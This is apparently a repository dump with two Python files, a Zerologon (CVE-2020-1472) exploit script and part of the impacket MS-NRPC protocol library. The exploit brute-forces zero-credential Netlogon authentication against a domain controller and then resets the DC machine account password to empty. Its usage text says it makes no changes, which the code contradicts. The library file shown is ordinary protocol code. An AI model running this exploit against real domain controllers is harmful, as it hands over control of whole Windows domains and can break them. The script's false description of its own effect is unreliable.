├── CVE-2020-1472.py
└── nrpc.py


/CVE-2020-1472.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | 
  3 | from impacket.dcerpc.v5 import epm
  4 | from impacket.dcerpc.v5.dtypes import NULL
  5 | from impacket.dcerpc.v5 import transport
  6 | from impacket import crypto
  7 | import traceback
  8 | import hmac, hashlib, struct, sys, socket, time, nrpc
  9 | from binascii import hexlify, unhexlify
 10 | from subprocess import check_call
 11 | 
 12 | 
 13 | # Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be neccessary on average.
 14 | MAX_ATTEMPTS = 2000 # False negative chance: 0.04%
 15 | 
 16 | def fail(msg):
 17 |   print(msg, file=sys.stderr)
 18 |   print('This might have been caused by invalid arguments or network issues.', file=sys.stderr)
 19 |   sys.exit(2)
 20 | 
 21 | def try_zero_authenticate(dc_handle, dc_ip, target_computer):
 22 |   # Connect to the DC's Netlogon service.
 23 |   binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
 24 |   rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
 25 |   rpc_con.connect()
 26 |   rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
 27 | 
 28 |   # Use an all-zero challenge and credential.
 29 |   plaintext = b'\x00' * 8
 30 |   ciphertext = b'\x00' * 8
 31 | 
 32 |   # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled. 
 33 |   flags = 0x212fffff
 34 | 
 35 |   # Send challenge and authentication request.
 36 |   nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext)
 37 |   try:
 38 |     credential = nrpc.hNetrServerAuthenticate3(
 39 |       rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
 40 |       target_computer + '\x00', ciphertext, flags
 41 |     )
 42 |     # It worked!
 43 |     assert credential['ErrorCode'] == 0
 44 |     Authenticator = nrpc.NETLOGON_AUTHENTICATOR()
 45 |     Authenticator["Credential"] =  ciphertext
 46 |     Authenticator["Timestamp"] = 0
 47 |     Password = nrpc.NL_TRUST_PASSWORD()
 48 |     Password['Buffer'] = b'\x00' * 516
 49 |     Password['Length'] = '\x00' * 4
 50 |     if rpc_con:
 51 |         print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
 52 |         print('Trying to reseting machine password..')
 53 |         request  = nrpc.NetrServerPasswordSet2()
 54 |         request['PrimaryName']  = target_computer + '\x00'
 55 |         request['AccountName']  = target_computer + '$\x00'
 56 |         request['ComputerName'] = target_computer + '\x00'
 57 |         request['Authenticator']     = Authenticator
 58 |         request['ClearNewPassword']  = Password
 59 |         request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
 60 |         print("Sending the new password")
 61 |         req = rpc_con.request(request)
 62 |         print("Success")
 63 |         return True
 64 |     else:
 65 |         return False
 66 | 
 67 | 
 68 |   except nrpc.DCERPCSessionError as ex:
 69 |     # Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
 70 |     if ex.get_error_code() == 0xc0000022:
 71 |       return None
 72 |     else:
 73 |       fail(f'Unexpected error code from DC: {ex.get_error_code()}.')
 74 |   except Exception as e:
 75 |     traceback.print_exc()
 76 |     return True
 77 | 
 78 | 
 79 | def perform_attack(dc_handle, dc_ip, target_computer):
 80 |   # Keep authenticating until succesfull. Expected average number of attempts needed: 256.
 81 |   print('Performing authentication attempts...')
 82 |   rpc_con = None
 83 |   for attempt in range(0, MAX_ATTEMPTS):  
 84 |     rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
 85 |     
 86 |     if rpc_con != True:
 87 |       print('=', end='', flush=True)
 88 |     else:
 89 |       break
 90 | 
 91 | 
 92 | if __name__ == '__main__':
 93 |   if not (3 <= len(sys.argv) <= 4):
 94 |     print('Usage: zerologon_tester.py <dc-name> <dc-ip>\n')
 95 |     print('Tests whether a domain controller is vulnerable to the Zerologon attack. Does not attempt to make any changes.')
 96 |     print('Note: dc-name should be the (NetBIOS) computer name of the domain controller.')
 97 |     sys.exit(1)
 98 |   else:
 99 |     [_, dc_name, dc_ip] = sys.argv
100 | 
101 |     dc_name = dc_name.rstrip('$')
102 |     perform_attack('\\\\' + dc_name, dc_ip, dc_name)
103 | 
104 | 


--------------------------------------------------------------------------------
/nrpc.py:
--------------------------------------------------------------------------------
   1 | # SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
   2 | #
   3 | # This software is provided under under a slightly modified version
   4 | # of the Apache Software License. See the accompanying LICENSE file
   5 | # for more information.
   6 | #
   7 | # Author: Alberto Solino (@agsolino)
   8 | #
   9 | # Description:
  10 | #   [MS-NRPC] Interface implementation
  11 | #
  12 | #   Best way to learn how to use these calls is to grab the protocol standard
  13 | #   so you understand what the call does, and then read the test case located
  14 | #   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
  15 | #
  16 | #   Some calls have helper functions, which makes it even easier to use.
  17 | #   They are located at the end of this file.
  18 | #   Helper functions start with "h"<name of the call>.
  19 | #   There are test cases for them too.
  20 | #
  21 | from struct import pack
  22 | from six import b
  23 | from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRENUM, NDRUNION, NDRPOINTER, NDRUniConformantArray, \
  24 |     NDRUniFixedArray, NDRUniConformantVaryingArray
  25 | from impacket.dcerpc.v5.dtypes import WSTR, LPWSTR, DWORD, ULONG, USHORT, PGUID, NTSTATUS, NULL, LONG, UCHAR, PRPC_SID, \
  26 |     GUID, RPC_UNICODE_STRING, SECURITY_INFORMATION, LPULONG
  27 | from impacket import system_errors, nt_errors
  28 | from impacket.uuid import uuidtup_to_bin
  29 | from impacket.dcerpc.v5.enum import Enum
  30 | from impacket.dcerpc.v5.samr import OLD_LARGE_INTEGER
  31 | from impacket.dcerpc.v5.lsad import PLSA_FOREST_TRUST_INFORMATION
  32 | from impacket.dcerpc.v5.rpcrt import DCERPCException
  33 | from impacket.structure import Structure
  34 | from impacket import ntlm, crypto, LOG
  35 | import hmac
  36 | import hashlib
  37 | try:
  38 |     from Cryptodome.Cipher import DES, AES, ARC4
  39 | except ImportError:
  40 |     LOG.critical("Warning: You don't have any crypto installed. You need pycryptodomex")
  41 |     LOG.critical("See https://pypi.org/project/pycryptodomex/")
  42 | 
  43 | MSRPC_UUID_NRPC = uuidtup_to_bin(('12345678-1234-ABCD-EF00-01234567CFFB', '1.0'))
  44 | 
  45 | class DCERPCSessionError(DCERPCException):
  46 |     def __init__(self, error_string=None, error_code=None, packet=None):
  47 |         DCERPCException.__init__(self, error_string, error_code, packet)
  48 | 
  49 |     def __str__( self ):
  50 |         key = self.error_code
  51 |         if key in system_errors.ERROR_MESSAGES:
  52 |             error_msg_short = system_errors.ERROR_MESSAGES[key][0]
  53 |             error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
  54 |             return 'NRPC SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
  55 |         elif key in nt_errors.ERROR_MESSAGES:
  56 |             error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
  57 |             error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1]
  58 |             return 'NRPC SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
  59 |         else:
  60 |             return 'NRPC SessionError: unknown error code: 0x%x' % (self.error_code)
  61 | 
  62 | ################################################################################
  63 | # CONSTANTS
  64 | ################################################################################
  65 | # 2.2.1.2.5 NL_DNS_NAME_INFO
  66 | # Type
  67 | NlDnsLdapAtSite       = 22
  68 | NlDnsGcAtSite         = 25
  69 | NlDnsDsaCname         = 28
  70 | NlDnsKdcAtSite        = 30
  71 | NlDnsDcAtSite         = 32
  72 | NlDnsRfc1510KdcAtSite = 34
  73 | NlDnsGenericGcAtSite  = 36
  74 | 
  75 | # DnsDomainInfoType
  76 | NlDnsDomainName      = 1
  77 | NlDnsDomainNameAlias = 2
  78 | NlDnsForestName      = 3
  79 | NlDnsForestNameAlias = 4
  80 | NlDnsNdncDomainName  = 5
  81 | NlDnsRecordName      = 6
  82 | 
  83 | # 2.2.1.3.15 NL_OSVERSIONINFO_V1
  84 | # wSuiteMask
  85 | VER_SUITE_BACKOFFICE               = 0x00000004
  86 | VER_SUITE_BLADE                    = 0x00000400
  87 | VER_SUITE_COMPUTE_SERVER           = 0x00004000
  88 | VER_SUITE_DATACENTER               = 0x00000080
  89 | VER_SUITE_ENTERPRISE               = 0x00000002
  90 | VER_SUITE_EMBEDDEDNT               = 0x00000040
  91 | VER_SUITE_PERSONAL                 = 0x00000200
  92 | VER_SUITE_SINGLEUSERTS             = 0x00000100
  93 | VER_SUITE_SMALLBUSINESS            = 0x00000001
  94 | VER_SUITE_SMALLBUSINESS_RESTRICTED = 0x00000020
  95 | VER_SUITE_STORAGE_SERVER           = 0x00002000
  96 | VER_SUITE_TERMINAL                 = 0x00000010
  97 | 
  98 | # wProductType
  99 | VER_NT_DOMAIN_CONTROLLER = 0x00000002
 100 | VER_NT_SERVER            = 0x00000003
 101 | VER_NT_WORKSTATION       = 0x00000001
 102 | 
 103 | # 2.2.1.4.18 NETLOGON Specific Access Masks
 104 | NETLOGON_UAS_LOGON_ACCESS  = 0x0001
 105 | NETLOGON_UAS_LOGOFF_ACCESS = 0x0002
 106 | NETLOGON_CONTROL_ACCESS    = 0x0004
 107 | NETLOGON_QUERY_ACCESS      = 0x0008
 108 | NETLOGON_SERVICE_ACCESS    = 0x0010
 109 | NETLOGON_FTINFO_ACCESS     = 0x0020
 110 | NETLOGON_WKSTA_RPC_ACCESS  = 0x0040
 111 | 
 112 | # 3.5.4.9.1 NetrLogonControl2Ex (Opnum 18)
 113 | # FunctionCode
 114 | NETLOGON_CONTROL_QUERY             = 0x00000001
 115 | NETLOGON_CONTROL_REPLICATE         = 0x00000002
 116 | NETLOGON_CONTROL_SYNCHRONIZE       = 0x00000003
 117 | NETLOGON_CONTROL_PDC_REPLICATE     = 0x00000004
 118 | NETLOGON_CONTROL_REDISCOVER        = 0x00000005
 119 | NETLOGON_CONTROL_TC_QUERY          = 0x00000006
 120 | NETLOGON_CONTROL_TRANSPORT_NOTIFY  = 0x00000007
 121 | NETLOGON_CONTROL_FIND_USER         = 0x00000008
 122 | NETLOGON_CONTROL_CHANGE_PASSWORD   = 0x00000009
 123 | NETLOGON_CONTROL_TC_VERIFY         = 0x0000000A
 124 | NETLOGON_CONTROL_FORCE_DNS_REG     = 0x0000000B
 125 | NETLOGON_CONTROL_QUERY_DNS_REG     = 0x0000000C
 126 | NETLOGON_CONTROL_BACKUP_CHANGE_LOG = 0x0000FFFC
 127 | NETLOGON_CONTROL_TRUNCATE_LOG      = 0x0000FFFD
 128 | NETLOGON_CONTROL_SET_DBFLAG        = 0x0000FFFE
 129 | NETLOGON_CONTROL_BREAKPOINT        = 0x0000FFFF
 130 | 
 131 | ################################################################################
 132 | # STRUCTURES
 133 | ################################################################################
 134 | # 3.5.4.1 RPC Binding Handles for Netlogon Methods
 135 | LOGONSRV_HANDLE = WSTR
 136 | PLOGONSRV_HANDLE = LPWSTR
 137 | 
 138 | # 2.2.1.1.1 CYPHER_BLOCK
 139 | class CYPHER_BLOCK(NDRSTRUCT):
 140 |     structure = (
 141 |         ('Data', '8s=b""'),
 142 |     )
 143 |     def getAlignment(self):
 144 |         return 1
 145 | 
 146 | NET_API_STATUS = DWORD
 147 | 
 148 | # 2.2.1.1.2 STRING
 149 | from impacket.dcerpc.v5.lsad import STRING
 150 | 
 151 | # 2.2.1.1.3 LM_OWF_PASSWORD
 152 | class CYPHER_BLOCK_ARRAY(NDRUniFixedArray):
 153 |     def getDataLen(self, data, offset=0):
 154 |         return len(CYPHER_BLOCK())*2
 155 | 
 156 | class LM_OWF_PASSWORD(NDRSTRUCT):
 157 |     structure = (
 158 |         ('Data', CYPHER_BLOCK_ARRAY),
 159 |     )
 160 | 
 161 | # 2.2.1.1.4 NT_OWF_PASSWORD
 162 | NT_OWF_PASSWORD = LM_OWF_PASSWORD
 163 | ENCRYPTED_NT_OWF_PASSWORD = NT_OWF_PASSWORD
 164 | 
 165 | # 2.2.1.3.4 NETLOGON_CREDENTIAL
 166 | class UCHAR_FIXED_ARRAY(NDRUniFixedArray):
 167 |     align = 1
 168 |     def getDataLen(self, data, offset=0):
 169 |         return len(CYPHER_BLOCK())
 170 | 
 171 | class NETLOGON_CREDENTIAL(NDRSTRUCT):
 172 |     structure = (
 173 |         ('Data',UCHAR_FIXED_ARRAY),
 174 |     )
 175 |     def getAlignment(self):
 176 |         return 1
 177 | 
 178 | # 2.2.1.1.5 NETLOGON_AUTHENTICATOR
 179 | class NETLOGON_AUTHENTICATOR(NDRSTRUCT):
 180 |     structure = (
 181 |         ('Credential', NETLOGON_CREDENTIAL),
 182 |         ('Timestamp', DWORD),
 183 |     )
 184 | 
 185 | class PNETLOGON_AUTHENTICATOR(NDRPOINTER):
 186 |     referent = (
 187 |         ('Data', NETLOGON_AUTHENTICATOR),
 188 |     )
 189 | 
 190 | # 2.2.1.2.1 DOMAIN_CONTROLLER_INFOW
 191 | class DOMAIN_CONTROLLER_INFOW(NDRSTRUCT):
 192 |     structure = (
 193 |         ('DomainControllerName', LPWSTR),
 194 |         ('DomainControllerAddress', LPWSTR),
 195 |         ('DomainControllerAddressType', ULONG),
 196 |         ('DomainGuid', GUID),
 197 |         ('DomainName', LPWSTR),
 198 |         ('DnsForestName', LPWSTR),
 199 |         ('Flags', ULONG),
 200 |         ('DcSiteName', LPWSTR),
 201 |         ('ClientSiteName', LPWSTR),
 202 |     )
 203 | 
 204 | class PDOMAIN_CONTROLLER_INFOW(NDRPOINTER):
 205 |     referent = (
 206 |         ('Data', DOMAIN_CONTROLLER_INFOW),
 207 |     )
 208 | 
 209 | # 2.2.1.2.2 NL_SITE_NAME_ARRAY
 210 | class RPC_UNICODE_STRING_ARRAY(NDRUniConformantArray):
 211 |     item = RPC_UNICODE_STRING
 212 | 
 213 | class PRPC_UNICODE_STRING_ARRAY(NDRPOINTER):
 214 |     referent = (
 215 |         ('Data', RPC_UNICODE_STRING_ARRAY),
 216 |     )
 217 | 
 218 | class NL_SITE_NAME_ARRAY(NDRSTRUCT):
 219 |     structure = (
 220 |         ('EntryCount', ULONG),
 221 |         ('SiteNames', PRPC_UNICODE_STRING_ARRAY),
 222 |     )
 223 | 
 224 | class PNL_SITE_NAME_ARRAY(NDRPOINTER):
 225 |     referent = (
 226 |         ('Data', NL_SITE_NAME_ARRAY),
 227 |     )
 228 | 
 229 | # 2.2.1.2.3 NL_SITE_NAME_EX_ARRAY
 230 | class RPC_UNICODE_STRING_ARRAY(NDRUniConformantArray):
 231 |     item = RPC_UNICODE_STRING
 232 | 
 233 | class NL_SITE_NAME_EX_ARRAY(NDRSTRUCT):
 234 |     structure = (
 235 |         ('EntryCount', ULONG),
 236 |         ('SiteNames', PRPC_UNICODE_STRING_ARRAY),
 237 |         ('SubnetNames', PRPC_UNICODE_STRING_ARRAY),
 238 |     )
 239 | 
 240 | class PNL_SITE_NAME_EX_ARRAY(NDRPOINTER):
 241 |     referent = (
 242 |         ('Data', NL_SITE_NAME_EX_ARRAY),
 243 |     )
 244 | 
 245 | # 2.2.1.2.4 NL_SOCKET_ADDRESS
 246 | # 2.2.1.2.4.1 IPv4 Address Structure
 247 | class IPv4Address(Structure):
 248 |     structure = (
 249 |         ('AddressFamily', '<H=0'),
 250 |         ('Port', '<H=0'),
 251 |         ('Address', '<L=0'),
 252 |         ('Padding', '<L=0'),
 253 |     )
 254 | 
 255 | class UCHAR_ARRAY(NDRUniConformantArray):
 256 |     item = 'c'
 257 | 
 258 | class PUCHAR_ARRAY(NDRPOINTER):
 259 |     referent = (
 260 |         ('Data', UCHAR_ARRAY),
 261 |     )
 262 | 
 263 | class NL_SOCKET_ADDRESS(NDRSTRUCT):
 264 |     structure = (
 265 |         ('lpSockaddr', PUCHAR_ARRAY),
 266 |         ('iSockaddrLength', ULONG),
 267 |     )
 268 | 
 269 | class NL_SOCKET_ADDRESS_ARRAY(NDRUniConformantArray):
 270 |     item = NL_SOCKET_ADDRESS
 271 | 
 272 | # 2.2.1.2.5 NL_DNS_NAME_INFO
 273 | class NL_DNS_NAME_INFO(NDRSTRUCT):
 274 |     structure = (
 275 |         ('Type', ULONG),
 276 |         ('DnsDomainInfoType', WSTR),
 277 |         ('Priority', ULONG),
 278 |         ('Weight', ULONG),
 279 |         ('Port', ULONG),
 280 |         ('Register', UCHAR),
 281 |         ('Status', ULONG),
 282 |     )
 283 | 
 284 | # 2.2.1.2.6 NL_DNS_NAME_INFO_ARRAY
 285 | class NL_DNS_NAME_INFO_ARRAY(NDRUniConformantArray):
 286 |     item = NL_DNS_NAME_INFO
 287 | 
 288 | class PNL_DNS_NAME_INFO_ARRAY(NDRPOINTER):
 289 |     referent = (
 290 |         ('Data', NL_DNS_NAME_INFO_ARRAY),
 291 |     )
 292 | 
 293 | class NL_DNS_NAME_INFO_ARRAY(NDRSTRUCT):
 294 |     structure = (
 295 |         ('EntryCount', ULONG),
 296 |         ('DnsNamesInfo', PNL_DNS_NAME_INFO_ARRAY),
 297 |     )
 298 | 
 299 | # 2.2.1.3 Secure Channel Establishment and Maintenance Structures
 300 | # ToDo
 301 | 
 302 | # 2.2.1.3.5 NETLOGON_LSA_POLICY_INFO
 303 | class NETLOGON_LSA_POLICY_INFO(NDRSTRUCT):
 304 |     structure = (
 305 |         ('LsaPolicySize', ULONG),
 306 |         ('LsaPolicy', PUCHAR_ARRAY),
 307 |     )
 308 | 
 309 | class PNETLOGON_LSA_POLICY_INFO(NDRPOINTER):
 310 |     referent = (
 311 |         ('Data', NETLOGON_LSA_POLICY_INFO),
 312 |     )
 313 | 
 314 | # 2.2.1.3.6 NETLOGON_WORKSTATION_INFO
 315 | class NETLOGON_WORKSTATION_INFO(NDRSTRUCT):
 316 |     structure = (
 317 |         ('LsaPolicy', NETLOGON_LSA_POLICY_INFO),
 318 |         ('DnsHostName', LPWSTR),
 319 |         ('SiteName', LPWSTR),
 320 |         ('Dummy1', LPWSTR),
 321 |         ('Dummy2', LPWSTR),
 322 |         ('Dummy3', LPWSTR),
 323 |         ('Dummy4', LPWSTR),
 324 |         ('OsVersion', RPC_UNICODE_STRING),
 325 |         ('OsName', RPC_UNICODE_STRING),
 326 |         ('DummyString3', RPC_UNICODE_STRING),
 327 |         ('DummyString4', RPC_UNICODE_STRING),
 328 |         ('WorkstationFlags', ULONG),
 329 |         ('KerberosSupportedEncryptionTypes', ULONG),
 330 |         ('DummyLong3', ULONG),
 331 |         ('DummyLong4', ULONG),
 332 |     )
 333 | 
 334 | class PNETLOGON_WORKSTATION_INFO(NDRPOINTER):
 335 |     referent = (
 336 |         ('Data', NETLOGON_WORKSTATION_INFO),
 337 |     )
 338 | 
 339 | # 2.2.1.3.7 NL_TRUST_PASSWORD
 340 | class WCHAR_ARRAY(NDRUniFixedArray):
 341 |     def getDataLen(self, data, offset=0):
 342 |         return 512
 343 | 
 344 | class NL_TRUST_PASSWORD(NDRSTRUCT):
 345 |     structure = (
 346 |         ('Buffer', WCHAR_ARRAY),
 347 |         ('Length', LPWSTR),
 348 |     )
 349 | 
 350 | class PNL_TRUST_PASSWORD(NDRPOINTER):
 351 |     referent = (
 352 |         ('Data', NL_TRUST_PASSWORD),
 353 |     )
 354 | 
 355 | # 2.2.1.3.8 NL_PASSWORD_VERSION
 356 | class NL_PASSWORD_VERSION(NDRSTRUCT):
 357 |     structure = (
 358 |         ('ReservedField', ULONG),
 359 |         ('PasswordVersionNumber', ULONG),
 360 |         ('PasswordVersionPresent', ULONG),
 361 |     )
 362 | 
 363 | # 2.2.1.3.9 NETLOGON_WORKSTATION_INFORMATION
 364 | class NETLOGON_WORKSTATION_INFORMATION(NDRUNION):
 365 |     commonHdr = (
 366 |         ('tag', DWORD),
 367 |     )
 368 | 
 369 |     union = {
 370 |         1 : ('WorkstationInfo', PNETLOGON_WORKSTATION_INFO),
 371 |         2 : ('LsaPolicyInfo', PNETLOGON_LSA_POLICY_INFO),
 372 |     }
 373 | 
 374 | # 2.2.1.3.10 NETLOGON_ONE_DOMAIN_INFO
 375 | class NETLOGON_ONE_DOMAIN_INFO(NDRSTRUCT):
 376 |     structure = (
 377 |         ('DomainName', RPC_UNICODE_STRING),
 378 |         ('DnsDomainName', RPC_UNICODE_STRING),
 379 |         ('DnsForestName', RPC_UNICODE_STRING),
 380 |         ('DomainGuid', GUID),
 381 |         ('DomainSid', PRPC_SID),
 382 |         ('TrustExtension', RPC_UNICODE_STRING),
 383 |         ('DummyString2', RPC_UNICODE_STRING),
 384 |         ('DummyString3', RPC_UNICODE_STRING),
 385 |         ('DummyString4', RPC_UNICODE_STRING),
 386 |         ('DummyLong1', ULONG),
 387 |         ('DummyLong2', ULONG),
 388 |         ('DummyLong3', ULONG),
 389 |         ('DummyLong4', ULONG),
 390 |     )
 391 | 
 392 | class NETLOGON_ONE_DOMAIN_INFO_ARRAY(NDRUniConformantArray):
 393 |     item = NETLOGON_ONE_DOMAIN_INFO
 394 | 
 395 | class PNETLOGON_ONE_DOMAIN_INFO_ARRAY(NDRPOINTER):
 396 |     referent = (
 397 |         ('Data', NETLOGON_ONE_DOMAIN_INFO_ARRAY),
 398 |     )
 399 | 
 400 | # 2.2.1.3.11 NETLOGON_DOMAIN_INFO
 401 | class NETLOGON_DOMAIN_INFO(NDRSTRUCT):
 402 |     structure = (
 403 |         ('PrimaryDomain', NETLOGON_ONE_DOMAIN_INFO),
 404 |         ('TrustedDomainCount', ULONG),
 405 |         ('TrustedDomains', PNETLOGON_ONE_DOMAIN_INFO_ARRAY),
 406 |         ('LsaPolicy', NETLOGON_LSA_POLICY_INFO),
 407 |         ('DnsHostNameInDs', RPC_UNICODE_STRING),
 408 |         ('DummyString2', RPC_UNICODE_STRING),
 409 |         ('DummyString3', RPC_UNICODE_STRING),
 410 |         ('DummyString4', RPC_UNICODE_STRING),
 411 |         ('WorkstationFlags', ULONG),
 412 |         ('SupportedEncTypes', ULONG),
 413 |         ('DummyLong3', ULONG),
 414 |         ('DummyLong4', ULONG),
 415 |     )
 416 | 
 417 | class PNETLOGON_DOMAIN_INFO(NDRPOINTER):
 418 |     referent = (
 419 |         ('Data', NETLOGON_DOMAIN_INFO),
 420 |     )
 421 | 
 422 | # 2.2.1.3.12 NETLOGON_DOMAIN_INFORMATION
 423 | class NETLOGON_DOMAIN_INFORMATION(NDRUNION):
 424 |     commonHdr = (
 425 |         ('tag', DWORD),
 426 |     )
 427 | 
 428 |     union = {
 429 |         1 : ('DomainInfo', PNETLOGON_DOMAIN_INFO),
 430 |         2 : ('LsaPolicyInfo', PNETLOGON_LSA_POLICY_INFO),
 431 |     }
 432 | 
 433 | # 2.2.1.3.13 NETLOGON_SECURE_CHANNEL_TYPE
 434 | class NETLOGON_SECURE_CHANNEL_TYPE(NDRENUM):
 435 |     class enumItems(Enum):
 436 |         NullSecureChannel             = 0
 437 |         MsvApSecureChannel            = 1
 438 |         WorkstationSecureChannel      = 2
 439 |         TrustedDnsDomainSecureChannel = 3
 440 |         TrustedDomainSecureChannel    = 4
 441 |         UasServerSecureChannel        = 5
 442 |         ServerSecureChannel           = 6
 443 |         CdcServerSecureChannel        = 7
 444 | 
 445 | # 2.2.1.3.14 NETLOGON_CAPABILITIES
 446 | class NETLOGON_CAPABILITIES(NDRUNION):
 447 |     commonHdr = (
 448 |         ('tag', DWORD),
 449 |     )
 450 | 
 451 |     union = {
 452 |         1 : ('ServerCapabilities', ULONG),
 453 |     }
 454 | 
 455 | # 2.2.1.3.15 NL_OSVERSIONINFO_V1
 456 | class UCHAR_FIXED_ARRAY(NDRUniFixedArray):
 457 |     def getDataLen(self, data, offset=0):
 458 |         return 128
 459 | 
 460 | class NL_OSVERSIONINFO_V1(NDRSTRUCT):
 461 |     structure = (
 462 |         ('dwOSVersionInfoSize', DWORD),
 463 |         ('dwMajorVersion', DWORD),
 464 |         ('dwMinorVersion', DWORD),
 465 |         ('dwBuildNumber', DWORD),
 466 |         ('dwPlatformId', DWORD),
 467 |         ('szCSDVersion', UCHAR_FIXED_ARRAY),
 468 |         ('wServicePackMajor', USHORT),
 469 |         ('wServicePackMinor', USHORT),
 470 |         ('wSuiteMask', USHORT),
 471 |         ('wProductType', UCHAR),
 472 |         ('wReserved', UCHAR),
 473 |     )
 474 | 
 475 | class PNL_OSVERSIONINFO_V1(NDRPOINTER):
 476 |     referent = (
 477 |         ('Data', NL_OSVERSIONINFO_V1),
 478 |     )
 479 | 
 480 | # 2.2.1.3.16 NL_IN_CHAIN_SET_CLIENT_ATTRIBUTES_V1
 481 | class PLPWSTR(NDRPOINTER):
 482 |     referent = (
 483 |         ('Data', LPWSTR),
 484 |     )
 485 | 
 486 | class NL_IN_CHAIN_SET_CLIENT_ATTRIBUTES_V1(NDRSTRUCT):
 487 |     structure = (
 488 |         ('ClientDnsHostName', PLPWSTR),
 489 |         ('OsVersionInfo', PNL_OSVERSIONINFO_V1),
 490 |         ('OsName', PLPWSTR),
 491 |     )
 492 | 
 493 | # 2.2.1.3.17 NL_IN_CHAIN_SET_CLIENT_ATTRIBUTES
 494 | class NL_IN_CHAIN_SET_CLIENT_ATTRIBUTES(NDRUNION):
 495 |     commonHdr = (
 496 |         ('tag', DWORD),
 497 |     )
 498 | 
 499 |     union = {
 500 |         1 : ('V1', NL_IN_CHAIN_SET_CLIENT_ATTRIBUTES_V1),
 501 |     }
 502 | 
 503 | # 2.2.1.3.18 NL_OUT_CHAIN_SET_CLIENT_ATTRIBUTES_V1
 504 | class NL_OUT_CHAIN_SET_CLIENT_ATTRIBUTES_V1(NDRSTRUCT):
 505 |     structure = (
 506 |         ('HubName', PLPWSTR),
 507 |         ('OldDnsHostName', PLPWSTR),
 508 |         ('SupportedEncTypes', LPULONG),
 509 |     )
 510 | 
 511 | # 2.2.1.3.19 NL_OUT_CHAIN_SET_CLIENT_ATTRIBUTES
 512 | class NL_OUT_CHAIN_SET_CLIENT_ATTRIBUTES(NDRUNION):
 513 |     commonHdr = (
 514 |         ('tag', DWORD),
 515 |     )
 516 | 
 517 |     union = {
 518 |         1 : ('V1', NL_OUT_CHAIN_SET_CLIENT_ATTRIBUTES_V1),
 519 |     }
 520 | 
 521 | # 2.2.1.4.1 LM_CHALLENGE
 522 | class CHAR_FIXED_8_ARRAY(NDRUniFixedArray):
 523 |     def getDataLen(self, data, offset=0):
 524 |         return 8
 525 | 
 526 | class LM_CHALLENGE(NDRSTRUCT):
 527 |     structure = (
 528 |         ('Data', CHAR_FIXED_8_ARRAY),
 529 |     )
 530 | 
 531 | # 2.2.1.4.15 NETLOGON_LOGON_IDENTITY_INFO
 532 | class NETLOGON_LOGON_IDENTITY_INFO(NDRSTRUCT):
 533 |     structure = (
 534 |         ('LogonDomainName', RPC_UNICODE_STRING),
 535 |         ('ParameterControl', ULONG),
 536 |         ('Reserved', OLD_LARGE_INTEGER),
 537 |         ('UserName', RPC_UNICODE_STRING),
 538 |         ('Workstation', RPC_UNICODE_STRING),
 539 |     )
 540 | 
 541 | class PNETLOGON_LOGON_IDENTITY_INFO(NDRPOINTER):
 542 |     referent = (
 543 |         ('Data', NETLOGON_LOGON_IDENTITY_INFO),
 544 |     )
 545 | 
 546 | # 2.2.1.4.2 NETLOGON_GENERIC_INFO
 547 | class NETLOGON_GENERIC_INFO(NDRSTRUCT):
 548 |     structure = (
 549 |         ('Identity', NETLOGON_LOGON_IDENTITY_INFO),
 550 |         ('PackageName', RPC_UNICODE_STRING),
 551 |         ('DataLength', ULONG),
 552 |         ('LogonData', PUCHAR_ARRAY),
 553 |     )
 554 | 
 555 | class PNETLOGON_GENERIC_INFO(NDRPOINTER):
 556 |     referent = (
 557 |         ('Data', NETLOGON_GENERIC_INFO),
 558 |     )
 559 | 
 560 | # 2.2.1.4.3 NETLOGON_INTERACTIVE_INFO
 561 | class NETLOGON_INTERACTIVE_INFO(NDRSTRUCT):
 562 |     structure = (
 563 |         ('Identity', NETLOGON_LOGON_IDENTITY_INFO),
 564 |         ('LmOwfPassword', LM_OWF_PASSWORD),
 565 |         ('NtOwfPassword', NT_OWF_PASSWORD),
 566 |     )
 567 | 
 568 | class PNETLOGON_INTERACTIVE_INFO(NDRPOINTER):
 569 |     referent = (
 570 |         ('Data', NETLOGON_INTERACTIVE_INFO),
 571 |     )
 572 | 
 573 | # 2.2.1.4.4 NETLOGON_SERVICE_INFO
 574 | class NETLOGON_SERVICE_INFO(NDRSTRUCT):
 575 |     structure = (
 576 |         ('Identity', NETLOGON_LOGON_IDENTITY_INFO),
 577 |         ('LmOwfPassword', LM_OWF_PASSWORD),
 578 |         ('NtOwfPassword', NT_OWF_PASSWORD),
 579 |     )
 580 | 
 581 | class PNETLOGON_SERVICE_INFO(NDRPOINTER):
 582 |     referent = (
 583 |         ('Data', NETLOGON_SERVICE_INFO),
 584 |     )
 585 | 
 586 | # 2.2.1.4.5 NETLOGON_NETWORK_INFO
 587 | class NETLOGON_NETWORK_INFO(NDRSTRUCT):
 588 |     structure = (
 589 |         ('Identity', NETLOGON_LOGON_IDENTITY_INFO),
 590 |         ('LmChallenge', LM_CHALLENGE),
 591 |         ('NtChallengeResponse', STRING),
 592 |         ('LmChallengeResponse', STRING),
 593 |     )
 594 | 
 595 | class PNETLOGON_NETWORK_INFO(NDRPOINTER):
 596 |     referent = (
 597 |         ('Data', NETLOGON_NETWORK_INFO),
 598 |     )
 599 | 
 600 | # 2.2.1.4.16 NETLOGON_LOGON_INFO_CLASS
